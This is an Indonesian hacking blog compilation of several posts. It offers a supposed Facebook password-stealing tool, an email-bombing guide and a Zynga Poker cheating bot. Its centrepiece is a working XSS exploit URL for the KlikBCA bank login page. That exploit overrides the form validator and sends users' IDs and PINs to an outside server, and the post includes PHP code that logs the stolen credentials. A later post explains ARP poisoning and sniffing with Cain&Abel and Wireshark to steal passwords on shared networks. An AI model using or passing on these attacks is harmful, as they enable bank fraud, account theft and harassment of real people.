Pirates facebook hack v 1.5

Mengingat banyaknya peminat dan antusias para facebooker buat “menjahili” facebook orang lain, baik cuma iseng atau mau mengambil chip poker (Zynga Texas Hold’Em Poker atau permainan lainnya) saya tergerak untuk membantu kawan kawan semua sekali lagi, buat menyediakan software nya. Disini saya mencoba menawarkan sebuah software yang angka kegagalan mengambil password orang lain adalah 0%. software ini adalah Pirates facebook hack v 1.4 versi terbaru (mungkin anda sudah pernah melihat versi sebelumnya) sebuah software yang selain ini juga bisa hacking facebook orang lain dengan membajak server facebook sehingga email dan password korban bisa diketahui, software ini juga bisa digunakan untuk menjaga account facebook anda dari hacking. cara melakukan hacking untuk software ini agak sedikit rumit, oleh karena itu saya juga menyediakan video tutorialnya yang bisa di download di link yang saya sediakan. ketika anda membuka software ini, akan diminta passwordnya, passwordnya adalah a1b(untuk melihat password anda harus memblock semua tulisan) kalau dengan tool yang lain anda sering gagal, saya yakin dengan tool ini anda akan berhasil…

 

Pirates facebook hack v 1.5


Pirates facebook hack v 1.4 (password :a1b)

video tutorial

Sumber: http://www.wiredownload.com/

Iklan

Nge-Bomb email orang Pake Email Bomber

Apakah yang dimaksud dngan nge-bomb email???

adalah kegiatan mengirim email dalam jumlah banyak (tergantung kehendak) dengan tujuan iseng/untuk membuat inbox email target menjadi penuh…

Bagaimanakah caranya???

Menggunakan software Email Bomber.

* Isi subject dan Message sesuai isi email yg anda kehendaki

* Isi victim’s mail dengan alamat mail target yg ingin di-bomb

* Isi Your Gmail dngan alamat gmail anda.

* Isi kolom password dngan password email anda

* Klik tombol start

Maka software akan mulai mengirim email secara terus menerus hingga anda menekan tombol stop. Jumlah email yg dikirim bisa dilihat dari email sent: yg terdapat dibagian bawah window software… Anda juga dapat mengecek jumlah email yg anda kirim di account gmail anda dan mail yg anda kirim tak akan membuat penuh snt item account anda…

software dapat didownload di link ini…>>> Download email bomber

Liberty Bot Deluxe For Zynga Poker 1.35

Liberty Bot Deluxe Untuk Zynga Poker adalah sebuah bot (robot) program untuk bermain Zynga Poker secara otomatis. Didalam badan program ini telah tertanam dalam b
erbagai mesin dan AI (Kecerdasan buatan) untuk menyederhanakan dan mendapatkan kemenangan hingga 100% (asumsi bila menggunakan mode God Of Gambler).

Software ini mempunyai 4 engine bot dengan kemampuan yang berbeda. Normal, Professional, High Defense, dan God Of Gambler mode. Baca pe
tunjuk detilnya pada software atau klik saja tombol help.

Berbeda dengan software bot lainnya. Hanya Liberty Bot Deluxe yang mampu memberikan jaminan “All Cards Revealed” dikarenakan software ini memiliki teknologi yang mampu membaca streaming kartu (Hanya bila menggunakan mode God Of Gambler) dan mampu menampilkan kartu seluruh pemain pada Panel Cards.

Bagi yang menyukai game Zynga Poker, silahkan di download filenya (sudah termasuk video tutorial didalamnya) dibawah ini:
Liberty Bot Deluxe For Zynga Poker 1.35

(jika link rusak tolong hubungi saya)

Security KlikBCA – Recover Password With XSS

Sudah baca majalah Underground Info ? Di majalah itu ada artikel yang ditulis oleh S’to tentang XSS di halaman login klikbca.com. Dalam tulisan ini saya bahas lebih jauh lagi dan saya berikan contoh exploit yang cukup berbahaya dari vulnerability yang ditemukan S’to di majalah tersebut.
Maaf artikel ini bukan XSS basics, tentang apa itu XSS nanti saya akan bahas di artikel khusus.

Sebenarnya XSS termasuk bug yang gawat dan susah diantisipasi, namun XSS juga bug yang paling sering diremehkan. Karena berbeda dengan bug lain seperti SQL Injection yang menyerang server, bug ini tidak berpengaruh sama sekali terhadap server. XSS hanya menyerang client, yaitu pengguna web application.

Mungkin mereka berpikir apa sih hal terburuk yang bisa menimpa server dengan XSS? Memang tidak secara langsung, namun ingat satu bug bisa di-exploit dengan 1001 macam cara yang semakin lama semakin efektif. Anda akan terkejut menyadari bahwa bug “seremeh” ini ternyata bisa diexploit sedemikian rupa.

The Vulnerability

xss bug

Bug XSS ini akan muncul bila kita memasukkan username dan password yang salah. Ketika kita salah mengisi password, maka akan muncul dialog box yang memberitahu bahwa password kita salah.

URL ketika password kita salah adalah:

https://ibank.klikbca.com/authentication.do?value(actions)=logout&value(strError)=Mohon masukkan User ID/Password Anda yg benar \n (Please enter Your correct User ID/Password)

URL tersebut akan menghasilkan source html sebagai berikut:
<script>
var err=‘User ID harus Alpha Numerik/User ID must be Alpha Numeric’
alert(err);
iBankForm.action=‘login.jsp’;
iBankForm.submit();
</script>

Perhatikan bahwa setelah var err ditutup dengan karakter kutip (’). Jadi kalau kita ingin meng-injeksikan tag html atau javascript lain, kita harus tutup dulu dengan karakter (’). Mari kita coba untuk menampilkan dialog box berisi cookie dengan URL berikut:

https://ibank.klikbca.com/authentication.do?value(actions)=logout&value(strError)=TEST';alert(document.cookie);<!--
URL di atas menghasilkan source html berikut:

1
2
3
4
5
6
<script type=“text/javascript”>
var err=‘TEST’;alert(document.cookie);<!–‘
alert(err);
iBankForm.action=’login.jsp‘;
iBankForm.submit();
</script>

Proses injeksi tersebut bisa dijelaskan dalam gambar berikut ini (klik gambar untuk lebih detil):

klikbca3

Oke saya rasa cukup main-mainnya, saya tidak terlalu suka cookie, saya ingin lebih dari itu, saya ingin username dan password.

Strategy and Tactics

Strategi yang saya pakai untuk mendapatkan username dan password sangatlah sederhana, yaitu dengan mengirimkan password dan username pada saat user meng-klik tombol submit. Untuk bisa menjalankan strategi itu saya menggunakan taktik berikut:

  1. Meng-intercept klik tombol submit
  2. Mengirimkan user dan password ke server saya
  3. Mencatat user dan password di server saya

Intercepting Submit Button

Saya menemukan kendala dalam mengintercept submit button. Kalau kita lihat pada source htmlnya button submit, kita akan temukan bahwa event onclick sudah di-hook untuk fungsi Login_Form_Validator. Setelah saya coba-coba, saya tidak bisa mengubah onclick itu ke fungsi lain.

1
2
3
<input type=“Submit” value=“LOGIN” name=“value(Submit)”
onclick=“javascript:return Login_Form_Validator(document.frmParam)”
onmouseover=“this.style.cursor=’hand’” />

Fungsi Login_Form_Validator digunakan untuk melakukan validasi awal apakah kita mengisi user dan password sesuai format yang benar.

var blnSubmitted = false;
function Login_Form_Validator( theForm ) {document.forms[0][‘value(user_id)’].autocomplete = ‘off’;
document.forms[0][‘value(pswd)’].autocomplete = ‘off’;

var blnResponse = false;
if (blnSubmitted) {
return false;
}

var strErrMsg = “”;
if( document.forms[0][‘value(user_id)’].value == ”) {
alert(“Silakan mengisi User ID anda/Please input your User ID”);
document.forms[0][‘value(user_id)’].focus();
return false;
}
if( document.forms[0][‘value(user_id)’].value.length>12) {
alert(“User ID/Password Anda salah / Your User ID/Password is Wrong”);
document.forms[0][‘value(user_id)’].select();
document.forms[0][‘value(user_id)’].focus();
return false;
}

if(document.forms[0][‘value(pswd)’].value == ”) {
alert(“Silakan mengisi PIN anda/Please input your PIN”);
document.forms[0][‘value(pswd)’].focus();
return false;
}
if(document.forms[0][‘value(pswd)’].value.length<6) {
alert(“PIN harus 6 Angka/PIN must be 6 digits”);
document.forms[0][‘value(pswd)’].focus();
return false;
}

//if(strErrMsg != ”) {
// alert(strErrMsg);
// return false;
//}

//blnSubmitted = confirm(“Click OK to login.”);
if ( !blnSubmitted ) {
blnSubmitted = true;
blnResponse = true;
}

//if(‘< %= blnLogout %>’==’true’)
//blnResponse = false;

return blnResponse;
}

Saya berpikir, bila mengubah onclick button ke fungsi lain tidak bisa, berarti kita harus menimpa fungsi Login_Form_Validator dengan fungsi kita sendiri. Biarkan event onclick button submit mengarah pada Login_Form_Validator, namun fungsi tersebut sudah kita ubah dengan code kita sendiri. Dengan kata lain kita define fungsi dengan nama yang sama, namun isi yang berbeda. Apakah itu akan menimbulkan dualisme fungsi? Iya tentu saja, karena satu fungsi yang sama tidak boleh di-definisikan dua kali.

Setelah saya perhatikan source htmlnya, ternyata saya diuntungkan dengan posisi fungsi Login_Form_Validator yang berada di baris paling bawah. Jadi yang saya lakukan adalah saya definisikan fungsi dengan nama Login_Form_Validator, dan kemudian saya buat browser untuk mengabaikan semua javascript di baris selanjutnya. Dengan cara ini fungsi Login_Form_Validator yang dikenal browser adalah Login_Form_Validator versi saya. Untuk itu saya tambahkan tag <noscript> dan tag awal komentar <! agar javascript pada baris sesudahnya diabaikan browser.

Jadi URL untuk menjalankan taktik saya di atas adalah:

https://ibank.klikbca.com/authentication.do?value(actions)=login&value(strError)=TEST';function Login_Form_Validator(theForm){alert('TEST');return false;}</script><noscript><!--

URL tersebut menghasilkan source html berikut:

<script>
var err=‘TEST’;function Login_Form_Validator(theForm){alert(‘TEST’);return false;}</script><noscript><!–‘
alert(err);
iBankForm.action=’login.jsp‘;
iBankForm.submit();
</script>

function overridden

Untuk menguji versi Login_Form_Validator manakah yang dipakai, klik tombol LOGIN tanpa mengisi username dan password. Ternyata yang muncul adalah dialog box “TEST”. Itu berarti fungsi yang berlaku adalah versi saya, HORE! Kalau versi aslinya, muncul peringatan bahwa user dan password harus diisi. Oke taktik pertama sukses. Mari kita Lanjut ke taktik ke-2.

Sending username and password

Oke, sekarang ketika user mengklik submit, code kita akan di-eksekusi. Now what? Selanjutnya tentu saja kita harus membuat code untuk mengirimkan user dan password pada saat user mengklik tombol submit. Untuk bisa mengirimkan data, berarti kita harus membuat browser melakukan request ke server saya. Saya menggunakan image untuk tujuan itu. Lho kok image? Iya karena ketika browser menemukan tag image, saat itu juga browser akan melakukan request GET ke server tempat image itu berada sesuai isi atribut SRC. Namun hal yang lebih penting lagi adalah, bila kita ubah atribut src dari object image dengan javascript, maka browser akan mengirimkan request GET sekali lagi. Request ini yang lebih penting, bukan request GET image pertama ketika halaman diload.

Saya definisikan tag image dengan dimensi 1×1 agar invisible, dengan nama myimage sebagai berikut:

<img src=“http://www.ilmuhacking.com/testcapture.php“ name=“myimage” width=“1″ height=“1″>

Sedangkan variabel yang berisi username dan password adalah:

document.forms[0][‘value(user_id)’].value
document.forms[0][‘value(pswd)’].value

Agar bisa mengirimkan user dan password, saya harus mengubah atribut src myimage menjadi:

'http://www.ilmuhacking.com/testcapture.php?userid='+document.forms[0]['value(user_id)'].value+'&passwd='+document.forms[0]['value(pswd)'].value

Selanjutnya saya harus membuat fungsi Login_Form_Validator mengubah atribut src myimage, agar ketika submit button di-klik maka atribut src myimage akan berubah dan browser akan melakukan request GET ke isi atribut src. Hal yang tricky adalah jika return dari fungsi Login_Form_Validator adalah false, browser baru akan melakukan request image. Bila tidak, browser akan mengabaikan perubahan atribut src, dan tetap melakukan submit.

Untuk menyiasatinya, saya terpaksa membuat agar button submit harus di klik 2x. Pada klik yang pertama tidak terjadi submit sesungguhnya, hal ini saya manfaatkan untuk mengubah atribut src myimage dan mengirim username/password ke server saya. Pada klik ke-2, browser baru melakukan submit yang sesungguhnya. Agak aneh memang, tapi saya yakin kebanyakan user tidak akan menyadari dan akan melanjutkan dengan meng-klik sekali lagi.

Saya buat satu variabel abc yang bernilai false pertama kali. Pada klik pertama, nilai abc menjadi true, sehingga pada klik ke-2 fungsi tidak mengembalikan nilai false. Fungsi Login_Form_Validator adalah sebagai berikut:

var abc=false;
function Login_Form_Validator(theForm {
if (!abc) {
document.images.myimage.src=‘http://www.ilmuhacking.com/testcapture.php‘+‘?userid=’+document.forms[0][‘value(user_id)’].value+‘&passwd=’+document.forms[0][‘value(pswd)’].value;
abc = true;
return false;
}
}

Kini sudah lengkap semua yang dibutuhkan, siap untuk diinjeksikan melalui URL sebagai berikut:

https://ibank.klikbca.com/authentication.do?value(actions)=login&value(strError)=TEST';var abc=false;function Login_Form_Validator(theForm){if (!abc) {abc=true;document.images.myimage.src='http://www.ilmuhacking.com/testcapture.php?userid='%2Bdocument.forms[0]['value(user_id)'].value%2B'%26passwd='%2Bdocument.forms[0]['value(pswd)'].value;return false;}}</script><img name="myimage" src="http://www.ilmuhacking.com/testcapture.php" width="1" height="1"><noscript><!--

URL di atas adalah EXPLOIT. Tugas attacker adalah membuat orang lain yang ingin login, meng-klik melalui link tersebut. Ada banyak cara untuk itu. Salah satunya adalah dengan membuat link dengan anchor text di samarkan, seperti ini:

Klik di sini untuk login.

Bila kita coba isi dengan username:abc1234 dan password:123456. Maka pada klik pertama akan ada request GET ke URL berikut ini:

http://www.ilmuhacking.com/testcapture.php?userid=abc1234&passwd=123456

Baru pada klik ke-2, username dan password tersebut di-submit dengan request POST ke server yang benar.

Saving User and Password

Sekarang bagian yang paling mudah, yaitu menyimpan username dan password yang masuk. Dalam contoh ini saya gunakan URL www.ilmuhacking.com/testcapture.php

Saya menyimpan user dan password dalam file capture.txt. Kode PHP yang saya gunakan untuk menyimpan user dan password adalah sebagai berikut:

1
2
3
4
5
6
7
8
9
10
11
<?php
$file=fopen(“capture.txt”,“a+”);
$userid=$_GET[“userid”];
$passwd=$_GET[“passwd”];
$ipaddr=$_SERVER[“REMOTE_ADDR”];
$now = date(“Ymd H:i:s”);
if (!empty($userid)) {
fwrite($file,“$userid =&amp;gt; $passwd (at $now from $ipaddr)\n“);
}
fclose($file);
?>

Kesimpulan

Ternyata bug yang di-remehkan seperti XSS sekalipun, bila di-exploit bisa jadi berbahaya. Saya telah buktikan dengan contoh sederhana ini. Di tangan orang yang tepat celah sekecil apapun bisa menjadi masalah besar. Pesan saya: Never Underestimate Vulnerabilities

Penggunaan enkripsi https sama sekali tidak berguna dalam kasus ini. Karena https hanya menjamin authentication dan confidentiality saja.

=================== [ EOF ] =====================

Cara Mengenal Hacking Wireless/WiFi/Hotspot dan Triknya

Wi-Fi (Wireless Fidelity)

Wi-Fi (Wireless Fidelity) adalah koneksi tanpa kabel seperti handphone dengan mempergunakan teknologi radio sehingga pemakainya dapat mentransfer data dengan cepat. Wi-Fi tidak hanya dapat digunakan untuk mengakses internet, Wi-Fi juga dapat digunakan untuk membuat jaringan tanpa kabel di perusahaan. Karena itu banyak orang mengasosiasikan Wi-Fi dengan “Kebebasan” karena teknologi Wi-Fi memberikan kebebasan kepada pemakainya untuk mengakses internet atau mentransfer data dari ruang meeting, kamar hotel, kampus, dan café-café yang bertanda “Wi-Fi Hot Spot”.

Awalnya Wi-Fi ditujukan untuk pengunaan perangkat nirkabel dan Jaringan Area Lokal (LAN), namun saat ini lebih banyak digunakan untuk mengakses internet. Hal ini memungkinan seseorang dengan komputer dengan kartu nirkabel (wireless card) atau personal digital assistant (PDA) untuk terhubung dengan internet dengan menggunakan titik akses (atau dikenal dengan hotspot) terdekat.

Spesifikasi

Wi-Fi dirancang berdasarkan spesifikasi IEEE 802.11. Sekarang ini ada empat variasi dari 802.11, yaitu: 802.11a, 802.11b, 802.11g, and 802.11n. Spesifikasi b merupakan produk pertama Wi-Fi. Variasi g dan n merupakan salah satu produk yang memiliki penjualan terbanyak pada 2005.

Spesifikasi Wi-Fi
Spesifikasi Kecepatan Frekuensi
Band
Cocok
dengan
802.11b 11 Mb/s 2.4 GHz B
802.11a 54 Mb/s 5 GHz A
802.11g 54 Mb/s 2.4 GHz b, g
802.11n 100 Mb/s 2.4 GHz b, g, n

Secara teknis operasional, Wi-Fi merupakan salah satu varian teknologi komunikasi dan informasi yang bekerja pada jaringan dan perangkat WLAN (wireless local area network). Dengan kata lain, Wi-Fi adalah sertifikasi merek dagang yang diberikan pabrikan kepada perangkat telekomunikasi (internet) yang bekerja di jaringan WLAN dan sudah memenuhi kualitas kapasitas interoperasi yang dipersyaratkan.

Teknologi internet berbasis Wi-Fi dibuat dan dikembangkan sekelompok insinyur Amerika Serikat yang bekerja pada Institute of Electrical and Electronis Engineers (IEEE) berdasarkan standar teknis perangkat bernomor 802.11b, 802.11a dan 802.16. Perangkat Wi-Fi sebenarnya tidak hanya mampu bekerja di jaringan WLAN, tetapi juga di jaringan Wireless Metropolitan Area Network (WMAN).

Karena perangkat dengan standar teknis 802.11b diperuntukkan bagi perangkat WLAN yang digunakan di frekuensi 2,4 GHz atau yang lazim disebut frekuensi ISM (Industrial, Scientific dan edical). Sedang untuk perangkat yang berstandar teknis 802.11a dan 802.16 diperuntukkan bagi perangkat WMAN atau juga disebut Wi-Max, yang bekerja di sekitar pita frekuensi 5 GHz.

Kelebihan Wi-fi

Tingginya animo masyarakat -khususnya di kalangan komunitas Internet- menggunakan teknologi Wi-Fi dikarenakan paling tidak dua faktor.

  1. kemudahan akses. Artinya, para pengguna dalam satu area dapat mengakses Internet secara bersamaan tanpa perlu direpotkan dengan kabel.
  2. pengguna yang ingin melakukan surfing atau browsing berita dan informasi di Internet, cukup membawa PDA (pocket digital assistance) atau laptop berkemampuan Wi-Fi ke tempat dimana terdapat access point atau hotspot.

Menjamurnya hotspot di tempat-tempat tersebut -yang dibangun oleh operator telekomunikasi, penyedia jasa Internet bahkan orang perorangan- dipicu faktor kedua, yakni karena biaya pembangunannya yang relatif murah atau hanya berkisar 300 dollar Amerika Serikat. Juga salah satu kelebihan dari Wi-Fi adalah kecepatannya yang beberapa kali lebih cepat dari modem kabel yang tercepat. Jadi pemakai Wi-Fi tidak lagi harus berada di dalam ruang kantor untuk bekerja

Wi-fi Hardware

Hardware wi-fi yang ada di pasaran saat ini ada berupa

Wi-fi dalam bentuk PCI Wi-fi dalam bentuk USB

Ada 2 mode akses koneksi Wi-fi, yaitu

Ad-Hoc

Mode koneksi ini adalah mode dimana beberapa komputer terhubung secara langsung, atau lebih dikenal dengan istilah Peer-to-Peer. Keuntungannya, lebih murah dan praktis bila yang terkoneksi hanya 2 atau 3 komputer, tanpa harus membeli access point

Infrastruktur

Menggunakan Access Point yang berfungsi sebagai pengatur lalu lintas data, sehingga memungkinkan banyak Client dapat saling terhubung melalui jaringan (Network).

Kelemahan pada wifi

Mudahnya dihacking oleh para hacer untuk mencuri password pengguna wi-fi

Cara adalah sebagai berikut:

Pertama kita harus mengetahui perbedaan antara jaringan Hub dan Switch:

* Pada jaringan hub semua data yang mengalir di jaringan dapat dilihat/diambil oleh komputer manapun yang ada di jaringan asalakan komputer tersebut merequest data tersebut, kalo tidak direquest ya tidak akan datang.

* Pada jaringan switch hanya komputer yang melakukan pertukaran data yang dapat melihat data tersebut, komputer2 lain tidak berhak merequest data tersebut.

Masalahnya adalah harga dari router hub dan switch tidak berbeda jauh sehingga kebanyakan tempat sekarang sudah menggunakan metode switch yang menyulitkan untuk network hacking.

Hacking ini menggunakan teknik:

  • Sniffing
  • ARP Poison Routing

Kedua Teknik di atas tidak akan bisa dicegah oleh firewall apapun di komputer korban, dijamin.

Important Note: ARP Poison Routing dapat meyebabkan denial of service (dos) pada salah satu / semua komputer pada network anda

Kelebihan:

  1. Tidak akan terdeteksi oleh firewall tipe dan seri apapun karena kelemahannya terletak pada sistem jaringan bukan pada komputernya
  2. Bisa mencuri semua jenis login password yang melalui server HTTP
  3. Bisa mencuri semua login password orang yang ada di jaringan Hub selama program diaktifkan
  4. Untuk ARP Poisoning bisa digunakan untuk mencuri password di HTTPS
  5. Semua programnya free
  6. Untuk jaringan Switch harus di ARP poisoning 1 persatu dan bandwidth anda akan termakan banyak untuk hal itu (kalo inet super cepat ga masalah)
  7. Ketahuan / tidak oleh admin jaringan di luar tanggung jawab saya
  8. Mulai dari sini anggap bahwa di network dalam kisah ini ada 3 komputer, yaitu:
  9. Komputer Korban
  10. Komputer Hacker
  11. Server

Langkah-langkah pertama:

  1. 1. Cek tipe jaringan anda, anda ada di jaringan switch / hub. Jika anda berada di jaringan hub bersyukurlah karena proses hacking anda akan jauh lebih mudah.
  2. 2. Download program-program yang dibutuhkan yaitu Wireshark dan Cain&Abel.Code:

http://www.wireshark.org/download.html
http://www.oxid.it/cain.html

Cara Menggunakan WireShark:

  1. Jalankan program wireshark
  2. Tekan tombol Ctrl+k (klik capture lalu option)
  3. Pastikan isi pada Interfacenya adalah Ethernet Card anda yang menuju ke jaringan, bila bukan ganti dan pastikan pula bahwa “Capture packets in promiscuous mode” on
  4. Klik tombol start
  5. Klik tombol stop setelah anda merasa yakin bahwa ada password yang masuk selamaanda menekan tombol start
  6. Anda bisa melihat semua jenis packet yang masuk dan keluar di jaringan (atau pada komputer anda saja jika network anda menggunakan Swtich
  7. Untuk menganalisis datanya klik kanan pada data yang ingin di analisis lalu klik “Follow TCP Stream” dan selamat menganalisis paketnya (saya tidak akan menjelaskan caranya karena saya tidak bisa )
  8. Yang jelas dari data itu pasti di dalamnya terdapat informasi2 yang dimasukkan korban ke website dan sebaliknya

Cara di atas hanya berlaku apabila jaringan anda adalah Hub bukan switch
Dari cara di atas anda dapat mengetahui bahwa jaringan anda adalah hub/switch dengan melihat pada kolom IP Source dan IP Destination. Bila pada setiap baris salah satu dari keduanya merupakan ip anda maka dapat dipastikan jaringan anda adalah jaringan switch, bila tidak ya berarti sebaliknya.

Cara Menggunakan Cain&Abel:

  • * Penggunaan program ini jauh lebih mudah dan simple daripada menggunakan wireshark, tetapi bila anda menginginkan semua packet yang sudah keluar dan masuk disarankan anda menggunakan program wireshark
  • * Buka program Cain anda
  • * Klik pada bagian configure
  • * Pada bagian “Sniffer” pilih ethernet card yang akan anda gunakan
    * Pada bagian “HTTP Fields” anda harus menambahkan username fields dan password fields nya apabila yang anda inginkan tidak ada di daftar.
    Sebagai contoh saya akan beritahukan bahwa kalo anda mau hack password Friendster anda harus menambahkan di username fields dan passworsd fields kata name, untuk yang lain anda bisa mencarinya dengan menekan klik kanan view source dan anda harus mencari variabel input dari login dan password website tersebut. Yang sudah ada di defaultnya rasanyan sudah cukup lengkap, anda dapat mencuri pass yang ada di klubmentari tanpa menambah apapun.
  • * Setelah itu apply settingannya dan klik ok
  • * Di menu utama terdapat 8 tab, dan yang akan dibahas hanya 1 tab yaitu tab “Sniffer” karena itu pilih lah tab tersebut dan jangan pindah2 dari tab tersebut untuk mencegah kebingungan anda sendiri
  • * Aktifkan Sniffer dengan cara klik tombol sniffer yang ada di atas tab2 tersebut, carilah tombol yang tulisannya “Start/Stop Sniffer”
  • * Bila anda ada di jaringan hub saat ini anda sudah bisa mengetahui password yang masuk dengan cara klik tab (Kali ini tab yang ada di bawah bukan yang di tengah, yang ditengah sudah tidak usah diklik-klik lagi) “Passwords”
    * Anda tinggal memilih password dari koneksi mana yang ingin anda lihat akan sudah terdaftar di sana
  • * Bila anda ternyata ada di jaringan switch, ini membutuhkan perjuangan lebih, anda harus mengaktifkan APR yang tombolonya ada di sebelah kanan Sniffer (Dan ini tidak dijamin berhasil karena manage dari switch jauh lebih lengkap&secure dari hub)
  • * Sebelum diaktifkan pada tab sniffer yang bagian bawah pilih APR
  • * Akan terlihat 2 buah list yang masih kosong, klik list kosong bagian atas kemudian klik tombol “+” (Bentuknya seperti itu) yang ada di jajaran tombol sniffer APR dll
  • * Akan ada 2 buah field yang berisi semua host yang ada di jaringan anda
  • * Hubungkan antara alamat ip korban dan alamat ip gateway server (untuk mengetahui alamat gateway server klik start pada komp anda pilih run ketik cmd lalu ketik ipconfig pada command prompt)
  • * Setelah itu baru aktifkan APR, dan semua data dari komp korban ke server dapat anda lihat dengan cara yang sama.

Anda dapat menjalankan kedua program di atas secara bersamaan (Cain untuk APR dan wireshark untuk packet sniffing) bila ingin hasil yang lebih maksimal.

Password yang bisa anda curi adalah password yang ada di server HTTP (server yang tidak terenkripsi), bila data tersebut ada di server yang terenkripsi maka anda harus mendekripsi data tersebut sebelum memperoleh passwordnya (dan itu akan membutuhkan langkah2 yang jauh lebih panjang dari cara hack ini)

Untuk istilah-istilah yang tidak ngerti bisa dicari di wikipedia (tapi yang inggris ya kalo yang indo jg belum tentu ada).

Secara teknologis jalur frekuensi -baik 2,4 GHz maupun 5 GHz- yang menjadi wadah operasional teknologi Wi-Fi tidak bebas dari keterbatasan .

Pasalnya, pengguna dalam suatu area baru dapat memanfaatkan sistem Internet nirkabel ini dengan optimal, bila semua perangkat yang dipakai pada area itu menggunakan daya pancar yang seragam dan terbatas.

Apabila prasyarat tersebut tidak diindahkan, dapat dipastikan akan terjadi harmful interference bukan hanya antar perangkat pengguna Internet, tetapi juga dengan perangkat sistem telekomunikasi lainnya.

Bila interferensi tersebut berlanjut -karena penggunanya ingin lebih unggul dari pengguna lainnya, maupun karenanya kurangnya pemahaman terhadap keterbatasan teknologinya- pada akhirnya akan membuat jalur frekuensi 2,4 GHz dan 5 GHz tidak dapat dimanfaatkan secara optimal.

Keterbatasan lain dari kedua jalur frekuensi nirkabel ini (khususnya 2,4 GHz) ialah karena juga digunakan untuk keperluan ISM (industrial, science and medical).

Konsekuensinya, penggunaan komunikasi radio atau perangkat telekomunikasi lain yang bekerja pada pada pita frekuensi itu harus siap menerima gangguan dari perangkat ISM, sebagaimana tertuang dalam S5.150 dari Radio Regulation.

Dalam rekomendasi ITU-R SM.1056, diinformasikan juga karakteristik perangkat ISM yang pada intinya bertujuan mencegah timbulnya interferensi, baik antar perangkat ISM maupun dengan perangkat telekomunikasi lainnnya.

Rekomendasi yang sama menegaskan bahwa setiap anggota ITU bebas menetapkan persyaratan administrasi dan aturan hukum yang terkait dengan keharusan pembatasan daya.

Menyadari keterbatasan dan dampak yang mungkin timbul dari penggunaan kedua jalur frekuensi nirkabel tersebut, berbagai negara lalu menetapkan regulasi yang membatasi daya pancar perangkat yang digunakan.

Sinyal Wireless

Sinyal wireless LAN normalnya dapat ditangkap pada kisaran sekitar 200 meter dari access point, tetapi client yang menggunakan antena eksternal dapat menangkap sinyal sampai sejauh 1000 meter. Apabila anda menempatkan AP dekat pintu atau jendela, dapat dipastikan para tetangga dapat ikut menikmati akses Internet atau melakukan sniffing terhadap traffic network.

Apabila infrastruktur wireless LAN itu melibatkan koneksi wireless antar-gedung tinggi, maka client yang tidak diinginkan dapat melakukan sniffing dari bawah sejauh sampai 2.500 kaki (762 meter). Jadi walaupun sinyal wireless LAN para ISP yang dipasangkan di puncak-puncak gedung tinggi dapat di-sniffing dari bawah (dikenal sebagai war flying).

Jika anda ingin connect internet menggunakan wifi sementara anda jauh AP atau dari tempat wifi yang tersedia anda bisa mendekatkan diri dengan area tersebut dan bisa main internet sepuasnya dengan langkah sebagai berikut

1) Anda harus memiliki USB Wireless Adapter. Yang bisa anda dapatkan ditoko toko komputer dengan harga berkisar Rp 210.000 (cukup murah untuk technology secanggih ini) + antenna UHF bentuk parabola.

2) Langkah ini merupakan langkah kunci, yaitu dengan menggunakan antenna UHV yang berbentuk Grid Parabolic sebagai Reflector untuk memperkuat sinyal.

3) Untuk lebih memperkuat daya reflexy dari parabole anda dapat menambahkan kawat kasa pada seluruh permukaan, lalujangan lupa disekrup dengan rangka parabola. Anda juga bisa menambahkan alumunium foil.

4) Pasanglah USB WiFi Adapter pada tiang penyangga yang ada di tengah parabola. Apabila terlalu panjang dari fokusnya dapat dipotong.

Usahakan agar USB WiFI terletak pada fokus parabola. Ingat kan rumus fokus parabola. Kalau ragu nih rumus sederhananya.

F= D(kuadrat) / 4(kuadrat).c

D: diameter parabola

C: kedalaman parabola

5) pasang kabel USB( High Speed 2.0 usb cable system) sedemikian rupa.

6) Lalu pasang kembali tiang penyangga USB wifi pada parabola. Pasang pada pipa besi untuk mempermudah antenne supaya enak diputar putar.

7) Kalau udah install driver USB WiFI tadi (bawaan pabrik).

Lalu install “NETWORK STUMBLER” untuk mencari sinyal yang kuat dan terdekat.

icon cool Cara Mengenal Hacking Wireless/WiFi/Hotspot dan Triknya Pasang antenna diluar dan masukkan kabel USB pada port komputer anda. Scan pake Net Stumbler. Cari jaringan yang ngga’ di ENCRYPT dan jaraknya paling deket dengan anda. Lalu join aja.

Akses ke wifi :

jenis :

secure, artinya untuk dapat mengakses kita harus memasukkan password

unsecure, artinya kita bisa mengakses wifi tanpa harus mengisikan password, jd langsung konek.

Yang unsecure, kadang juga tidak bisa mengakses internet walau bisa konek ke jaringan. Hal ini karena ada pengaturan IP. Untuk server yang menggunakan ip dinamik, maka kita tidak usah pusing dengan ip, karena ip sdh otomatis dimasukkan oleh server ke klien (computer kita).

Untuk server yang menggunakan static ip, maka kita harus secara manual memasukkan ip untuk computer/laptop kita.

Jika kita bisa konek ke wifi tp tidak bisa akses internet, cobalah ubah ip laptop kita. Caranya :

  • klik kanan icon wifi di bawah kanan layar
  • pilih properties
  • pilih Advanced
  • pada bagian connection pilih Internet Protocol (TCP/IP)
  • pilih static ip
  • pada ip isi : 192.168.0.212
  • pada Net Mask isi : 255.255.255.0
  • pada getway isi : 192.168.0.1
  • pada dns server isi : 192.168.0.1
  • klik ok.

Untuk pertanyaan mengenai topik ini tanyakan saja langsung ke penulis di blog dibawah ini…karna saya juga belum pernah nyoba, sy cuma mau berbagi ilmu saja,

Sumber: supralova.comli.com/tutorial/cara-mengenal-wireless-hacking-dan-segala-triknya/

Untitled1 Cara Mengenal Hacking Wireless/WiFi/Hotspot dan Triknya

Please Spread To The World – Share The Love 

Twitter Facebook Delicious Google Delicious Stumbleupon Delicious Technorati Reddit GoogleBuzz Buzz Myspace Yahoo Favorites More

Mengganti Logo Google Dengan Nama Kita

Google adalah mesin pencari yang sangat populer sekarang ini, dimana kita bisa mencari informasi apa saja dengan memasukkan keyword pada search engine tersebut, sehingga membuat blogger berlomba-lomba untuk mengoptimalkan blognya agar bisa berada pada halaman pertama pencarian google. Ternyata kita bisa merubah logo google menjadi nama kita, sebagai contoh lihat gambar dibawah ini :


Tertarik ga’ untuk merubah logo google menjadi nama anda ? kalau tertarik lakukan cara berikut :

1. Buka http://funnylogo.info

2. Pada Step 1 (Enter your name) masukkan nama yang anda inginkan

3. Pada Step 2 (Choose a style) pilih Google Style, selain google style anda juga bisa memilih style lainnya seperti : yahoo, harry potter, coca cola, mickey mouse dll.

4. Create My Search Engine

Sekarang halaman google sudah diganti dengan nama yang anda inginkan, silahkan browsing apa saja yang anda inginkan pada halaman tersebut dan bisa dijadikan sebagai tampilan pada halaman default ketika membuka browser.

Crack Folder Lock

